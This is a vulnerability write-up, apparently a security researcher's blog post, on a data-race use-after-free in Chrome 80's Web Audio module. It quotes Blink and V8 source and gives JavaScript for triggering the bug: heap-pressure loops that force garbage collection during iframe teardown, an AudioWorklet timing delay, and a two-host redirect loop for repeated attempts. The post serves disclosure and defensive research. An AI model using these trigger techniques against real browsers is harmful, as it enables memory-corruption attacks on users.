In this post and the next we’ll review the details of some use-after-free bugs that I found in the Web Audio module in Google Chrome. Although the vulnerabilities are found in Web Audio, the way they’re triggered involves more general techniques, which will be the focus of these posts.
More specifically, this post covers a use-after-free that's triggered by a data race, and how some internals of the garbage collector can be used to trigger it. While the bug is fairly hard to exploit, the way it's triggered is interesting.
Web Audio
The vulnerability is found in the web audio module in Blink, which runs in the renderer process and is therefore sandboxed. It is the implementation of the Web Audio API in Chrome. In October 2019, Anton Ivanov and Alexey Kulaev at Kaspersky reported a vulnerability in this module that was exploited in the wild. Since then, Sergei Glazunov of Google Project Zero has carried out variant analysis using CodeQL and discovered three variants of this bug (see also Maddie Stone's presentation at BlueHat IL for more background).
I’ll now go through some concepts in web audio that are required to understand the issues covered in this and the next post. Before reading this, it will be helpful to familiarize yourself with Web Audio’s basic concepts documented here.
BaseAudioContext, AudioNode and AudioHandler
BaseAudioContext is the implementation of the BaseAudioContext interface of the Web Audio API. It provides the rendering context for creating AudioNode objects, which are used for building graphs to process audio input. For more information, review the concepts behind the Web Audio API.
AudioNode provides an interface to Javascript and delegates its operations to AudioHandler. Each AudioNode holds the AudioHandler that is responsible for its implementation as a scoped_refptr, thereby keeping it alive. An AudioNode also holds the BaseAudioContext that it's created in as a Member, meaning that a BaseAudioContext cannot be garbage collected until all AudioNode objects that it created are garbage collected.
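To make these relationships concrete, here is a minimal JavaScript sketch using standard Web Audio API calls (the specific context and node types are just for illustration and are not taken from the actual proof of concept):

// An OfflineAudioContext is a BaseAudioContext; every node created from it
// is an AudioNode that is backed internally by an AudioHandler.
const ctx = new OfflineAudioContext(1, 44100, 44100);  // channels, frames, sample rate
const gain = new GainNode(ctx);  // AudioNode; holds its AudioHandler as a scoped_refptr
gain.connect(ctx.destination);   // builds the rendering graph
// While `gain` is reachable from script, the AudioNode cannot be garbage
// collected, and since it holds the context as a Member, neither can the
// BaseAudioContext.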
Rendering graph pulling and ownership transfer of AudioHandler
Each BaseAudioContext holds a special AudioNode that is derived from AudioDestinationNode as a Member. This node implements the methods needed to walk the audio graph and render the audio input. For example, the OfflineAudioContext implements this in the DoOfflineRendering method.
During rendering, if an AudioNode gets garbage collected, the AudioHandler that's used for rendering may get deleted and cause use-after-free bugs, such as what happened in this issue. To prevent such vulnerabilities, when an AudioNode gets garbage collected (which happens on the main thread) while rendering is happening in the audio thread, it transfers ownership of its AudioHandler to the DeferredTaskHandler, which keeps the handler alive until the current rendering unit (quantum) is done. Clearing out these orphan handlers happens either at the end of the quantum, when RequestToDeleteHandlersOnMainThread is called, or when ClearHandlersToBeDeleted is called as the execution context (e.g. a web page or iframe) is destroyed. Both of these clear out rendering_orphan_handlers_ and may delete the AudioHandler that was transferred to it.
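As a hedged illustration of this ownership transfer (the node types and timing here are assumptions for the sake of the example, not the original proof of concept), a node can be made unreachable while offline rendering is under way:

const ctx = new OfflineAudioContext(1, 44100 * 10, 44100);
let osc = new OscillatorNode(ctx);
osc.connect(ctx.destination);
osc.start();
ctx.startRendering();  // the audio thread starts pulling on the graph
// Drop the only script reference; a later GC on the main thread can then
// dispose of the AudioNode while rendering is still in progress, at which
// point its AudioHandler is handed over to rendering_orphan_handlers_ in
// the DeferredTaskHandler until the current quantum finishes.
osc = null;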
GraphAutoLocker and tear_down_mutex_
As AudioHandler objects are often accessed in the audio thread while being destroyed in the main thread, care must be taken to prevent them from being accessed while the main thread is trying to destroy them. This is usually done using the GraphAutoLocker and the more recently introduced tear_down_mutex_. Access to AudioHandler objects in the audio thread must be protected by one of these locks to prevent a use-after-free caused by a data race. There are also other, more fine-grained locks that are specific to particular nodes, such as the process_lock_ that's relevant to the issues found by Anton Ivanov and Alexey Kulaev (at Kaspersky) and Sergei Glazunov of Google Project Zero mentioned in the introduction.
The vulnerability
The current issue is a use-after-free caused by a data race where access to AudioHandler isn't protected. It's fairly easy to trigger on the master branch at the time of the report (@f440b57), where the tear_down_mutex_ has been removed, but triggering it on the release branch (80.0.3987.132) is a lot more interesting, and that's what we'll start with.
On 80.0.3987.132, the rendering method in OfflineAudioDestinationNode contains the following code:
  {
    MutexTryLocker try_locker(Context()->GetTearDownMutex());
    if (try_locker.Locked()) {
      DCHECK_GE(NumberOfInputs(), 1u);

      // This will cause the node(s) connected to us to process, which in turn
      // will pull on their input(s), all the way backwards through the
      // rendering graph.
      AudioBus* rendered_bus = Input(0).Pull(destination_bus, number_of_frames);

      if (!rendered_bus) {
        destination_bus->Zero();
      } else if (rendered_bus != destination_bus) {
        // in-place processing was not possible - so copy
        destination_bus->CopyFrom(*rendered_bus);
      }
    } else {
      destination_bus->Zero();
    }

    // Process nodes which need a little extra help because they are not
    // connected to anything, but still need to process.
    Context()->GetDeferredTaskHandler().ProcessAutomaticPullNodes(  //<--- Only protected if try_locker succeeded
        number_of_frames);
  }
Note that the above snippet tries to acquire the tear down lock, and if it succeeds, it performs Input(0).Pull(...). However, ProcessAutomaticPullNodes is performed regardless of whether the lock was acquired successfully. Inside the ProcessAutomaticPullNodes method, the AudioHandler objects in rendering_automatic_pull_handlers_ are accessed:
void DeferredTaskHandler::ProcessAutomaticPullNodes(
    uint32_t frames_to_process) {
  DCHECK(IsAudioThread());

  for (unsigned i = 0; i < rendering_automatic_pull_handlers_.size(); ++i) {
    rendering_automatic_pull_handlers_[i]->ProcessIfNecessary(
        frames_to_process);
  }
}
If the audio thread fails to acquire the tear down lock, then access to rendering_automatic_pull_handlers_ won't be protected. While this looks like a candidate for a data race, let's take a look at what it takes to get a use-after-free bug out of it. rendering_automatic_pull_handlers_ is updated every time DeferredTaskHandler::UpdateAutomaticPullNodes is called. This happens when HandlePreRenderTasks is called, right before the audio thread tries to acquire the tear down lock:
  if (Context()->HandlePreRenderTasks(nullptr, nullptr)) {  //<--- Updates `rendering_automatic_pull_handlers_`
    SuspendOfflineRendering();
    return true;
  }

  {
    MutexTryLocker try_locker(Context()->GetTearDownMutex());
    if (try_locker.Locked()) {
      DCHECK_GE(NumberOfInputs(), 1u);
This update is itself protected by the graph lock.
The fact that rendering_automatic_pull_handlers_ is updated here means that any change to the graph, such as the destruction of the AudioNode that is needed to trigger a use-after-free, must happen after Context()->HandlePreRenderTasks is called, or at least after rendering_automatic_pull_handlers_ is updated there; otherwise the AudioHandler will simply be removed from rendering_automatic_pull_handlers_ and won't be used again.
In order to cause a use-after-free in ProcessAutomaticPullNodes, we first need to destroy the AudioNode objects that hold the AudioHandler objects in rendering_automatic_pull_handlers_. This requires a garbage collection of these AudioNode objects to happen after rendering_automatic_pull_handlers_ is updated in the audio thread. As garbage collection will call AudioNode::Dispose, which is protected by the graph lock, this can only happen after HandlePreRenderTasks has completed. However, this is not enough to destroy the AudioHandler. As this happens during audio rendering, the AudioNode will transfer ownership of its AudioHandler to rendering_orphan_handlers_ in the DeferredTaskHandler, which means that after this point, both rendering_orphan_handlers_ and rendering_automatic_pull_handlers_ are responsible for keeping these handlers alive. Both of these are cleared when ClearHandlersToBeDeleted is called:
void DeferredTaskHandler::ClearHandlersToBeDeleted() {
  DCHECK(IsMainThread());

  GraphAutoLocker locker(*this);
  tail_processing_handlers_.clear();
  rendering_orphan_handlers_.clear();
  deletable_orphan_handlers_.clear();
  automatic_pull_handlers_.clear();
  rendering_automatic_pull_handlers_.clear();
  active_source_handlers_.clear();
}
As rendering_automatic_pull_handlers_ is cleared last, calling ProcessAutomaticPullNodes while rendering_automatic_pull_handlers_ is being cleared may cause a use-after-free bug.
To cause an unprotected access in ProcessAutomaticPullNodes, on the other hand, the audio thread must fail to acquire the tear down lock. This means that the BaseAudioContext::Uninitialize method must be called before the audio thread tries to acquire the lock, and this will also call ClearHandlersToBeDeleted to clear out the handlers.
The following shows the order of events that needs to happen in the main thread and the audio thread: on the main thread, a GC cycle needs to be started and completed, and then the execution context needs to be destroyed and BaseAudioContext::Uninitialize called, all between the end of HandlePreRenderTasks and the attempt to acquire Context()->GetTearDownMutex() in the audio thread:
  if (Context()->HandlePreRenderTasks(nullptr, nullptr)) {
    ...
  }

  // Destruction window: GC needs to complete here, followed by a call to
  // BaseAudioContext::Uninitialize.
  {
    MutexTryLocker try_locker(Context()->GetTearDownMutex());
    if (try_locker.Locked()) {
      DCHECK_GE(NumberOfInputs(), 1u);
Unless there is a way to cause the two threads to run at significantly different speeds, it is practically impossible to fit all of this into such a tight window. If anyone does know how to do that, please feel free to reach out, as I'd be very interested to learn.
Triggering GC in BaseAudioContext::Uninitialize
Another idea is to see if there is any way to trigger GC in the BaseAudioContext::Uninitialize method itself, before ClearHandlersToBeDeleted is called. That way, we only need to time it so that BaseAudioContext::Uninitialize is called before the audio thread gets hold of the tear down lock, which is not difficult. As it turns out, BaseAudioContext::Uninitialize calls RejectPendingResolvers before ClearHandlersToBeDeleted in order to reject all unresolved promises. In OfflineAudioContext, this allocates a DOMException for each unresolved promise:
void OfflineAudioContext::RejectPendingResolvers() {
  ...
  for (auto& pending_suspend_resolver : scheduled_suspends_) {
    pending_suspend_resolver.value->Reject(MakeGarbageCollected<DOMException>(
        DOMExceptionCode::kInvalidStateError, "Audio context is going away"));  //<--- Allocates GCed objects
  }
  ...
}
Allocating with MakeGarbageCollected causes memory pressure and can potentially trigger a garbage collection. Trying to trigger GC using unresolved promises alone, however, is fairly difficult, as DOMException objects are small and it would take a prohibitively large number of promises to trigger GC. We therefore need to build up memory pressure beforehand.
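From the JavaScript side, such unresolved promises can be stacked up ahead of time by scheduling suspends on the OfflineAudioContext and never resuming it; a rough sketch (the count and suspend times are arbitrary, not taken from the original exploit):

const ctx = new OfflineAudioContext(1, 44100 * 100, 44100);
for (let i = 1; i < 1000; i++) {
  // Each pending suspend promise corresponds to an entry in scheduled_suspends_
  // and will be rejected (allocating a DOMException) in RejectPendingResolvers.
  ctx.suspend(i * 0.1).catch(() => {});  // swallow the eventual rejection
}
ctx.startRendering();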
When a GarbageCollected (on-heap) object is allocated, AllocateObject will first try to allocate the memory from existing free space that it manages; failing that, it will go to OutOfLineAllocate to allocate some new free space and then allocate the object there. After the object is allocated, OutOfLineAllocate will call AllocatedObjectSizeSafepoint, which, through a series of calls, ends up calling EmbedderHeapTracer::IncreaseAllocatedSize and then LocalEmbedderHeapTracer::StartIncrementalMarkingIfNeeded:
void LocalEmbedderHeapTracer::StartIncrementalMarkingIfNeeded() {
  if (!FLAG_global_gc_scheduling || !FLAG_incremental_marking) return;

  Heap* heap = isolate_->heap();
  heap->StartIncrementalMarkingIfAllocationLimitIsReached(
      heap->GCFlagsForIncrementalMarking(),
      kGCCallbackScheduleIdleGarbageCollection);
  if (heap->AllocationLimitOvershotByLargeMargin()) {
    heap->FinalizeIncrementalMarkingAtomically(  //<--- Triggers a full GC
        i::GarbageCollectionReason::kExternalFinalize);
  }
}
At this point, if the heap->AllocationLimitOvershotByLargeMargin() check passes, a full GC will be triggered, collecting objects in both the old space and the young space. This check essentially looks at how much memory is already allocated (but not yet collected) and by how much it exceeds some threshold. The 'overshoot' value here is not just the size of the current allocation, but also includes memory that was allocated previously and has not yet been freed or collected. Once the overshoot value is high enough, a full GC is triggered, after which the allocated value and the threshold are adjusted. As the overshoot value takes into account all the memory that is currently allocated, by carefully controlling how much memory we allocate, we can trigger GC even with a small allocation, such as the allocations of DOMException objects in RejectPendingResolvers.
Getting the timing right
After some experimentation, I managed to trigger GC during RejectPendingResolvers, but only when I allocated a large amount of memory right before destroying the execution context. In my case, this sequence looks like:
// Prepare memory pressure
let arr = [];  // kept reachable so the large allocations stay live
for (let i = 0; i < 180; i++) {
  arr[i] = new Array(1024 * 1024);
  arr[i].fill(1);
}

let frame = document.getElementById("ifrm");
// Trigger BaseAudioContext::Uninitialize and then GC within it.
frame.parentNode.removeChild(frame);
Here ifrm is an iframe that contains the relevant BaseAudioContext, AudioHandler, etc., so removing it destroys the execution context. The resulting sequence of events across the two threads is what we now need to time correctly.
The main problem with a large allocation is that it's difficult to land both BaseAudioContext::Uninitialize and ClearHandlersToBeDeleted in the right place, because any small fluctuation in the allocation time causes big differences in the overall timing.
We use an AudioWorkletNode to control the timing. As this node uses a user-supplied function to process the audio, I'm able to use it to control the timing in the audio thread. By using an AudioWorkletNode with a delay that's roughly equal to the time between BaseAudioContext::Uninitialize and ClearHandlersToBeDeleted, I can get ClearHandlersToBeDeleted to run concurrently with ProcessAutomaticPullNodes, provided I can get BaseAudioContext::Uninitialize to land in this window:
  if (!IsInitialized()) {
    destination_bus->Zero();
    return false;
  }

  // Window start to trigger `BaseAudioContext::Uninitialize`
  if (Context()->HandlePreRenderTasks(nullptr, nullptr)) {
    SuspendOfflineRendering();
    return true;
  }
  // Window end to trigger `BaseAudioContext::Uninitialize`

  {
    MutexTryLocker try_locker(Context()->GetTearDownMutex());
For a component_build, which is mostly used during development to speed up build times, the tear down lock somehow ends up synchronizing the two threads. This is because BaseAudioContext::Uninitialize has to land while the AudioWorkletNode is processing and then wait for the tear down lock to be released before it can continue, which is effectively when BaseAudioContext::Uninitialize runs, and that point is fairly consistent in relation to the rendering quantum. As it turns out, when BaseAudioContext::Uninitialize is called this way, it also lands in the appropriate window in the next rendering quantum, which makes it easy to control the timing and trigger the bug. On a non-component build, although the tear down lock still synchronizes the threads in the same way, BaseAudioContext::Uninitialize somehow triggers too early and misses the window. To synchronize the two threads there, you would probably need to use currentFrame in the AudioWorkletProcessor, which can be accessed in both the audio and main threads, to get the timing right. I believe this is doable, but rather tedious, and I haven't actually tried it myself.
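For reference, one way to implement such a delay in a worklet processor is sketched below; the busy-wait and the 5 ms constant are placeholders of my own rather than the values used in the actual exploit, and the currentFrame reporting is only an idea for how the synchronization could be done:

// delay-processor.js — loaded with ctx.audioWorklet.addModule('delay-processor.js')
class DelayProcessor extends AudioWorkletProcessor {
  process(inputs, outputs, parameters) {
    const delayMs = 5;  // tuning parameter; needs adjusting per build/machine
    const start = Date.now();
    while (Date.now() - start < delayMs) {}  // stall the audio thread

    // currentFrame is available in the AudioWorkletGlobalScope; posting it to
    // the main thread is one way to line the two threads up.
    this.port.postMessage(currentFrame);
    return true;  // keep the processor alive
  }
}
registerProcessor('delay-processor', DelayProcessor);

The corresponding node is then created on the main thread with new AudioWorkletNode(ctx, 'delay-processor') and connected into the rendering graph.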
Getting reliability through unlimited retries
As the data race relies on getting the timing right, it may require multiple tries to trigger it. Normally, this could be done by reloading the page. However, because a reload does not reset the allocation threshold, which is crucial for triggering GC in the right place, reloading the page does not work in this case. Instead, this can be done by setting up two different hosts that serve the same page and have them redirect to one another. Essentially, this reloads the page from a different host. By doing so, a new renderer is used to load the page each time, thereby resetting the state of the allocation threshold (among other things). This means that the bug can likely be triggered with just a single click that launches the page (after enough retries).
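A minimal sketch of such a redirect loop, with hypothetical host names, could look like this on each of the two pages:

// Bounce to the same PoC page on the other host if the bug did not trigger.
// host-a.example and host-b.example are placeholders for the two origins.
function retryFromOtherHost() {
  const other = location.host === 'host-a.example' ? 'host-b.example'
                                                   : 'host-a.example';
  location.href = 'https://' + other + location.pathname;
}

// Give the current attempt a few seconds; if the renderer is still alive,
// retry from the other host so a fresh renderer (with a fresh allocation
// threshold) is used for the next attempt.
setTimeout(retryFromOtherHost, 5000);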